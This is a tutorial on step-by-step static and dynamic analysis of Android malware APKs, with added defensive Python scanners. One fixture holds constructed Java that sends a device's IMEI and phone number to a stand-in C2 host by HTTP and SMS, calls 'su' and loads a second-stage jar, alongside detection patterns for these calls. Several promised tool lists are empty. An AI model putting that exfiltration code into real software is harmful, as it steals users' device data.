Today I will introduce readers to the basic steps for analyzing a mobile malware sample. Below is the step-by-step model I follow when analyzing my own malicious-code samples. In this article I will focus on a detailed description of each step and of the tools used in it; in the following article I will focus on guiding you through installing and using those tools.
Always work on a copy of the sample, so that the analysis does not alter the original file.
When we receive an APK file suspected of containing malicious code, the first thing we do is install it in a sandboxed emulator environment to monitor its behavior and the permissions it requests. The signs to watch for include:
– The permissions requested at installation
– The icon, compared with the original application
– The network traffic it generates (we can use Wireshark to monitor traffic on the line).
The first two signs are quick and intuitive to check. The only difficult one is network traffic monitoring, because the malicious code may be programmed to send information to the attacker only within a certain time window, so a short capture can miss it. At the end of step 1 we should have: information on the icon, to see whether it differs from the original application (in case the malicious code was inserted into a popular application); the permissions requested at installation; and the device's network traffic before and after the application was installed.
After completing step 1 we analyze the APK file itself. An APK file is actually a ZIP archive containing the compiled code, images, icons, … of the application. To do this step, rename the .apk extension to .zip and extract the archive; this gives us every file packed inside the .apk. We then go through the extracted files. Besides the file formats inherent to Android, an APK may contain executable malicious code that runs when the application is installed or launched, or files whose extension has been changed to fool the system. Therefore we must examine each file inside the APK carefully.
At the end of step 2 we should have a list of the suspicious files contained in the sample APK.
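As an added example (not code from the original post), the following script does the step 2 check programmatically: it opens the APK as a ZIP archive, classifies every entry by its leading bytes rather than its extension, and flags executable content (dex, ELF, nested archive) that hides behind a wrong extension or sits under assets/ or res/. The APK it inspects is a constructed stand-in built in memory; the entry names, magic-byte table and expected-extension table are this example's own assumptions.

```python
import io
import os
import zipfile

# Magic bytes of the content types worth recognizing inside an APK.
# Constructed lookup table for this example; extend it as needed.
MAGIC = {
    b"dex\n": "dex bytecode",
    b"\x7fELF": "ELF native binary",
    b"PK\x03\x04": "ZIP/JAR/APK archive",
    b"\x89PNG": "PNG image",
}
EXECUTABLE = {"dex bytecode", "ELF native binary", "ZIP/JAR/APK archive"}

# Extensions under which each content type is legitimately expected.
EXPECTED = {
    ".dex": "dex bytecode",
    ".so": "ELF native binary",
    ".jar": "ZIP/JAR/APK archive",
    ".apk": "ZIP/JAR/APK archive",
    ".png": "PNG image",
}


def sniff(head: bytes) -> str:
    """Classify a file by its leading bytes instead of trusting its extension."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def inspect_apk(apk_bytes: bytes) -> list:
    """Return (entry name, detected type, reason) for entries that deserve a closer look."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            with z.open(info) as f:
                kind = sniff(f.read(8))
            ext = os.path.splitext(info.filename)[1].lower()
            if kind in EXECUTABLE and EXPECTED.get(ext) != kind:
                findings.append((info.filename, kind,
                                 "executable content under a non-matching or missing extension"))
            elif kind in EXECUTABLE and info.filename.startswith(("assets/", "res/")):
                findings.append((info.filename, kind,
                                 "executable payload stored under assets/ or res/"))
    return findings


def build_sample_apk() -> bytes:
    """Constructed APK-like ZIP for this example; entries are synthetic stubs, not real code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 16)               # normal
        z.writestr("lib/armeabi-v7a/libnative.so", b"\x7fELF" + b"\x00" * 16)    # normal
        z.writestr("res/drawable/icon.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)  # normal
        z.writestr("assets/update.png", b"dex\n035\x00" + b"\x00" * 16)         # dex hidden as PNG
        z.writestr("assets/plugin.apk", b"PK\x03\x04" + b"\x00" * 16)           # nested APK
        z.writestr("res/raw/helper", b"\x7fELF" + b"\x00" * 16)                 # ELF, no extension
    return buf.getvalue()


if __name__ == "__main__":
    for name, kind, reason in inspect_apk(build_sample_apk()):
        print(f"{name}: {kind} -> {reason}")
```

Run it against a real sample by replacing `build_sample_apk()` with the bytes of the copied .apk; the output is the "list of suspicious files" that step 2 is meant to produce, and the real AndroidManifest.xml, classes.dex and lib/ entries are left alone because their type matches their location.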
In this step we analyze the manifest file of the sample. In the manifest file we need to pay attention to the following characteristics:
To do this we need the help of analysis tools. Tools capable of viewing the manifest file include:
– SmaliViewer (this one is strong; its output is very complete and detailed)
– MobSF, an automated analysis tool that also lets us view the manifest section of the APK file.
At the end of step 3 we have a list of the characteristics listed above. Pay attention to the permissions declared in the manifest and the permissions requested at installation (obtained in step 1), and analyze whether those permissions are dangerous or not; we need to assess the danger of each permission being granted.
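The AndroidManifest.xml inside an APK is stored in a binary XML encoding, which is why the tools above are needed to read it. Once you have the decoded text form, the cross-check described in step 3 can be scripted. The example below is added here and is not from the original post: it extracts the declared permissions, marks the ones Android documents with the "dangerous" protection level, marks a few others that are commonly abused for persistence or overlays, lists receivers registered for boot or incoming-SMS broadcasts, and reports which dangerous permissions did not appear in the install-time dialog recorded in step 1. The manifest and the package name are constructed for the example; the permission tables are a subset, not a complete list.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Subset of permissions with protection level "dangerous" in Android's documentation.
DANGEROUS = {
    "android.permission.READ_SMS", "android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_CONTACTS", "android.permission.WRITE_CONTACTS",
    "android.permission.READ_CALL_LOG", "android.permission.CALL_PHONE",
    "android.permission.READ_PHONE_STATE",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.READ_EXTERNAL_STORAGE", "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.GET_ACCOUNTS",
}
# Not "dangerous" by protection level, but worth a second look (persistence, overlays, installs).
NOTABLE = {
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.REQUEST_INSTALL_PACKAGES",
    "android.permission.BIND_DEVICE_ADMIN",
}
# Broadcast actions whose receivers usually mark persistence or SMS interception.
WATCH_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED",
    "android.provider.Telephony.SMS_RECEIVED",
}

# Constructed manifest for the example: a "flashlight" app declaring far more than it needs.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.flashlight">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Flashlight">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SmsReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def analyze_manifest(xml_text: str, installer_permissions) -> dict:
    """Summarize a decoded manifest and compare it with the permissions seen at install time."""
    root = ET.fromstring(xml_text)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    receivers = {}
    for r in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in r.iter("action")}
        hit = actions & WATCH_ACTIONS
        if hit:
            receivers[r.get(ANDROID_NS + "name")] = sorted(hit)
    return {
        "package": root.get("package"),
        "permissions": sorted(perms),
        "dangerous": sorted(perms & DANGEROUS),
        "notable": sorted(perms & NOTABLE),
        # Declared as dangerous in the manifest but not recorded in the step 1 install dialog.
        "not_shown_at_install": sorted((perms & DANGEROUS) - set(installer_permissions)),
        "watched_receivers": receivers,
    }


if __name__ == "__main__":
    seen_at_install = {"android.permission.READ_SMS", "android.permission.SEND_SMS"}  # from step 1
    for key, value in analyze_manifest(SAMPLE_MANIFEST, seen_at_install).items():
        print(f"{key}: {value}")
```

The `not_shown_at_install` entry is the interesting discrepancy: a permission the manifest declares but the installer did not surface deserves a look at how and when the code requests it. A flashlight that needs SMS and boot receivers is the kind of mismatch between purpose and permissions that step 3 is meant to catch.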
Perform analysis of the Java code.
First we must convert the .dex files from the original APK into .jar format for analysis. We can use dex2jar to convert .dex to .jar.
To view the .jar file you can use the tool:
We start the analysis from the suspicious entry points: the main (launcher) activity, or the suspicious characteristics obtained in the steps above.
At the end of the code analysis we need to obtain the program's execution flow: the actions (code) that harvest information from the device and the destination that information is sent to, and the activities that may change the state of the device (such as rooting it).
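Reading every class by hand is slow, so a first pass usually greps the decompiled Java for the three things step 4 is looking for: where device information is read, where it leaves the device, and what touches the device's state. The script below is an added example, not the post's own tooling: it scans decompiled source text (however you obtained it from the .jar) for device-identifier sources, network and SMS sinks, privilege-changing calls and hard-coded URLs, then names the classes that both read device data and send it out, which are the ones to trace first. The three Java files, the package name and the URL (an example.invalid host) are constructed for the example; the API names in the pattern tables are real Android APIs, but the tables are only a starting subset.

```python
import re

# Where device information is read (constructed subset of Android APIs).
SOURCES = {
    "IMEI": r"\.getDeviceId\(",
    "IMSI": r"\.getSubscriberId\(",
    "phone number": r"\.getLine1Number\(",
    "ANDROID_ID": r"Settings\.Secure\.ANDROID_ID",
    "contacts": r"ContactsContract\.",
}
# Where data leaves the device.
SINKS = {
    "HTTP": r"HttpURLConnection|\.openConnection\(|HttpClient",
    "socket": r"new\s+Socket\(",
    "SMS": r"\.sendTextMessage\(",
}
# Calls that change the device's state or load code the static analysis cannot see.
PRIVILEGE = {
    "shell exec": r"Runtime\.getRuntime\(\)\.exec\(",
    "su invocation": r'"su"',
    "dynamic loading": r"DexClassLoader|PathClassLoader",
    "device admin": r"DevicePolicyManager",
}
URL_RE = re.compile(r'"(https?://[^"\s]+)"')

# Constructed decompiled sources for the example; not from any real sample.
SAMPLE_SOURCES = {
    "com/example/flashlight/MainActivity.java": """
public class MainActivity extends Activity {
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        setContentView(R.layout.main);
        new Collector().run(this);
    }
}
""",
    "com/example/flashlight/Collector.java": """
public class Collector {
    void run(Context c) {
        TelephonyManager tm = (TelephonyManager) c.getSystemService(Context.TELEPHONY_SERVICE);
        String imei = tm.getDeviceId();
        String number = tm.getLine1Number();
        URL u = new URL("http://c2.example.invalid/upload");
        HttpURLConnection conn = (HttpURLConnection) u.openConnection();
        conn.getOutputStream().write((imei + ":" + number).getBytes());
        SmsManager.getDefault().sendTextMessage("+15550000000", null, imei, null, null);
    }
}
""",
    "com/example/flashlight/Rooter.java": """
public class Rooter {
    void escalate(Context c) {
        Process p = Runtime.getRuntime().exec("su");
        new DexClassLoader(c.getDir("dex", 0).getPath() + "/stage2.jar", null, null, c.getClassLoader());
    }
}
""",
}


def scan(files: dict) -> dict:
    """Per source file, collect line-numbered hits for sources, sinks, privilege calls and URLs."""
    report = {}
    for path, src in files.items():
        hits = {"sources": [], "sinks": [], "privilege": [], "destinations": []}
        for no, line in enumerate(src.splitlines(), 1):
            for bucket, table in (("sources", SOURCES), ("sinks", SINKS), ("privilege", PRIVILEGE)):
                for label, pattern in table.items():
                    if re.search(pattern, line):
                        hits[bucket].append((no, label))
            for url in URL_RE.findall(line):
                hits["destinations"].append((no, url))
        if any(hits.values()):
            report[path] = hits
    return report


def exfil_candidates(report: dict) -> list:
    """Files that both read device data and push it out: the first places to read in detail."""
    return sorted(p for p, h in report.items() if h["sources"] and h["sinks"])


if __name__ == "__main__":
    result = scan(SAMPLE_SOURCES)
    for path, hits in result.items():
        print(path)
        for bucket, entries in hits.items():
            if entries:
                print(f"  {bucket}: {entries}")
    print("trace first:", exfil_candidates(result))
```

Point `scan()` at a dict built from the real decompiled tree (path to file text) and follow the reported line numbers back into the decompiler. The output gives the skeleton of the execution flow step 4 asks for: MainActivity calls Collector, Collector reads IMEI and phone number and sends them over HTTP and SMS, and Rooter is where the device's state is changed.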
After performing the manual analysis, one can use automated analysis tools and dynamic analysis of the sample to obtain more accurate results and to catch the elements missed during the manual steps. At this stage we can use two automated analysis tools:
In the next post I will show you how to work with these tools in detail.
Wait and see, bros. 😀